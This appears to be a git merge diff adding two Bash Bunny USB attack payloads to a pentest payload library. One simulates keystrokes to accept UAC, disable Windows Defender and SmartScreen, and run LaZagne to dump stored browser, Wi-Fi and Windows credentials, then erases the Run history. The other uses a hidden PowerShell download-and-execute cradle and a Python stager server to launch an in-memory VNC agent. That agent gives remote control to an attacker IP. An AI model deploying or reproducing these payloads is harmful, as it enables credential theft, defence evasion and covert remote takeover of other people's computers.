Merge 2be0d05f3e into 9bc2a0312d

Added NoDefenseAgainstLaZagne payload to credentials lib on for Bash Bunny

payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1

@@ -0,0 +1,6 @@
+$drivelabel = 'BashBunny'
+$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
+$filter = 'password_'+ $env:COMPUTERNAME
+$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
+Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

payloads/library/credentials/NoDefenseAgainstLaZagne/payload.txt

@@ -0,0 +1,90 @@
+#!/bin/bash
+#
+# Title:         Disable Windows Defender and Exfil stored passwords
+# Description:   Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... 
+#                This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. 
+#                This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
+# Author:        rafa-guillermo
+# Props:         Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
+# Version:       1.2
+# Category:      Credentials
+# Target:        Windows
+# Tested On:     Windows 11
+# Attackmodes:   HID, STORAGE
+
+# Options
+LOOTDIR=/root/udisk/loot/PasswordGrabber
+
+######## Set-up ########
+LED SETUP
+GET SWITCH_POSITION
+ATTACKMODE HID STORAGE
+DRIVE_LABEL=BashBunny
+
+######## Make Loot Dir ########
+# Setup named logs in loot directory
+mkdir -p $LOOTDIR
+
+####### Open a powershell window with elevated privileges #######
+LED STAGE1
+RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
+sleep 3 # wait for UAC prompt
+QUACK ALT y
+sleep 2
+
+# Disable Windows Defender File Scan and and Real Time Protection
+QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
+QUACK ENTER
+QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
+QUACK ENTER
+QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableScriptScanning \$true
+QUACK ENTER
+sleep 1
+
+# Run laZagne 
+LED STAGE2
+QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
+QUACK ENTER
+QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
+QUACK ENTER
+QUACK STRING \& \$scriptPath
+QUACK ENTER
+sleep 10
+QUACK STRING exit
+QUACK ENTER
+
+
+# Re-enable Defender and Smart screen
+LED CLEANUP
+RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
+sleep 3 # wait for UAC prompt
+QUACK ALT y
+sleep 2
+QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
+QUACK ENTER
+QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
+QUACK ENTER
+QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableScriptScanning \$false
+QUACK ENTER
+sleep 1
+QUACK STRING exit
+QUACK ENTER
+
+######## FINISH ########
+LED FINISH

payloads/library/credentials/NoDefenseAgainstLaZagne/readme.md

@@ -0,0 +1,39 @@
+# NoDefenseAgainstLaZagne
+
+* Author: [rafa-guillermo](https://github.com/rafa-guillermo)
+* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade, jdebetaz
+* Version: 1.0
+* Frimware support: 1.1 and higher
+* Target version: Windows 11
+* Tested on: Windows 11
+
+## Description
+Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
+
+Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
+Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber)
+
+## Configuration
+1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
+2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
+3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
+4. Plug your BashBunny and Enjoy
+
+
+## Info
+rafa-guillermo: I've added a whole bunch of stuff to disable Windows Defender file scanner, smart screen and RTP before running LaZagne, I was having issues where otherwise it would immediately be quarantined. Defender will be enabled again after execution.
+
+jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
+
+RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
+
+## Disclaimer
+__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
+
+## Led status
+
+| LED                                           | Status |
+|-----------------------------------------------|--------|
+| Magenta solid                                 | Setup  |
+| Yellow single blink                           | Attack |
+| Green 1000ms VERYFAST blink followed by SOLID | Finish |

payloads/library/remote_access/WindowsBindAndReverseVNC/README.md

@@ -0,0 +1,35 @@
+# Windows Bind and Reverse VNC
+* Author: El3ct71k (Nimrod Levy, Scorpiones)
+* Version: Version 1.0
+* Target: Windows 7, 8, 8.1, 10
+
+## Description
+In computing, Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction, over a network.
+Invoke-Vnc executes a VNC agent in-memory and initiates a reverse connection, or binds to a specified port. Password authentication is supported.
+
+## Configuration
+
+you must edit the payload file and update the following variables:
+
+* ATTACK_TYPE - with this variable you will choose with which type of payload you want execute (bind connection / reverse connection)
+1. bind - open VNC port on the victim host (connect directly to your victim)
+2. reverse - connect to the attacker VNC server (reverse connection, attacker machine must be on listen mode)
+
+### for reverse VNC please update the following variables:
+1. ATTACKER_IP - your VNC server (the IP must be resolved from the victim computer)
+2. VNC_PASS - A password for authentication to the victim
+3. PORT - A port that your attacker machine is binded
+
+### for bind VNC please update the following variables:
+1. VNC_PASS - A password for authentication to the victim
+2. PORT - A port that the victim computer will listen to (the IP must be resolved from the attacker computer)
+
+## On your attacker machine:
+* vncviewer -listen - in order to binds a vnc server on your attacker machine (this command is mentioned to reverse vnc)
+* vncviewer IP:PORT - in order to connect to victim computer (this command is mentioned to bind vnc)
+## STATUS
+
+1. Purple - Initial processing (cleanning cache files from previous execution and starts HTTP server)
+2. Yellow - Starts HID attack and typing a staged payload based on powershell
+3. Cyan - Starts Ethernet attack and waiting for the powershell payload that will executes the second payload from the server
+4. Green - Attack Finished

payloads/library/remote_access/WindowsBindAndReverseVNC/payload.txt

@@ -0,0 +1,45 @@
+#!/bin/bash
+#
+# Title: Invoke VNC attack
+# Author: El3ct71k, (Nimrod Levy, Scorpiones)
+# Version: 1.0
+#
+# Invoke-Vnc executes a VNC agent in-memory and initiates a reverse connection, or binds to a specified port. Password authentication is supported.
+LED SETUP
+ATTACKMODE HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+ATTACKER_IP=172.16.109.130
+VNC_PASS=P@ssw0rd
+PORT=5500
+ATTACK_TYPE=reverse # reverse or bind
+
+
+ATTACKMODE HID
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+rm -fr EOF
+# server.py can now instant bind sockets
+LED STAGE1
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python server.py &
+
+if [ "$ATTACK_TYPE" == "bind" ]; then
+    URL="http://$HOST_IP/?attack_type=bind&port=$PORT&password=$VNC_PASS"
+else
+    URL="http://$HOST_IP/?attack_type=reverse&port=$PORT&attacker_ip=$ATTACKER_IP&password=$VNC_PASS"
+fi
+
+RUN WIN "cmd.exe"
+QUACK DELAY 2000
+QUACK STRING "powershell -WindowStyle hidden \"while (\$true) { try { IEX(New-Object Net.WebClient).DownloadString('$URL'); exit } catch { Start-sleep -s 1 } }\""
+QUACK ENTER
+
+LED SPECIAL4
+
+ATTACKMODE RNDIS_ETHERNET
+
+LED ATTACK
+while [ ! -e  "/root/udisk/payloads/$SWITCH_POSITION/EOF" ]; do sleep 1; done;
+LED FINISH

payloads/library/remote_access/WindowsBindAndReverseVNC/server.py

@@ -0,0 +1,64 @@
+#!/usr/bin/python
+
+"""
+Invoke VNC attack
+Build by El3ct71k, Nimrod Levy (scorpiones)
+El3ct71k@Gmail.com
+"""
+
+import os
+import urlparse
+import time
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+
+abspath = os.path.abspath(__file__)
+CURR_DIR = os.path.dirname(abspath)
+
+
+class S(BaseHTTPRequestHandler):
+    def _set_headers(self):
+        self.send_response(200)
+        self.send_header('Content-type', 'text/plain')
+        self.end_headers()
+
+    def do_GET(self):
+        self._set_headers()
+        path = urlparse.urlparse(self.path)
+        path = urlparse.parse_qs(path.query)
+        if 'stage' in path:
+            with open("%s/Invoke-Vnc.ps1" % CURR_DIR, 'rb') as file_obj:
+                content = file_obj.read()
+                with open("%s/EOF" % CURR_DIR, 'w') as file_obj:
+                    file_obj.write("1")
+                self.wfile.write(content)
+        else:
+            if 'attack_type' in path and 'port' in path and 'password' in path:
+                with open("%s/stage1.ps1" % CURR_DIR, 'rb') as file_obj:
+                    content = file_obj.read().replace("IP_ADDRESS", self.client_address[0])
+                    if path['attack_type'][0] == "bind":
+                        attack_command = "Invoke-Vnc -ConType bind -Port {port} -Password {password}".format(
+                            port=path['port'][0], password=path['password'][0]
+                        )
+                    else:
+                        attack_command = "Invoke-Vnc -ConType reverse -IpAddress {attacker_ip} -Port {port} -Password {password}".format(
+                            attacker_ip=path['attacker_ip'][0], port=path['port'][0], password=path['password'][0]
+                        )
+                    content = content.replace("ATTACK_COMMAND", attack_command)
+                    content = content.replace("SERVER_IP", self.headers.get('Host'))
+                self.wfile.write(content)
+
+    def log_message(self, format, *args):
+        pass
+
+    def do_HEAD(self):
+        self._set_headers()
+
+
+def run(server_class=HTTPServer, handler_class=S, port=80):
+    server_address = ('', port)
+    httpd = server_class(server_address, handler_class)
+    httpd.serve_forever()
+
+
+if __name__ == "__main__":
+    run()

payloads/library/remote_access/WindowsBindAndReverseVNC/stage1.ps1

@@ -0,0 +1,4 @@
+Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
+IEX(New-Object Net.WebClient).DownloadString('http://SERVER_IP/?stage=2')
+ATTACK_COMMAND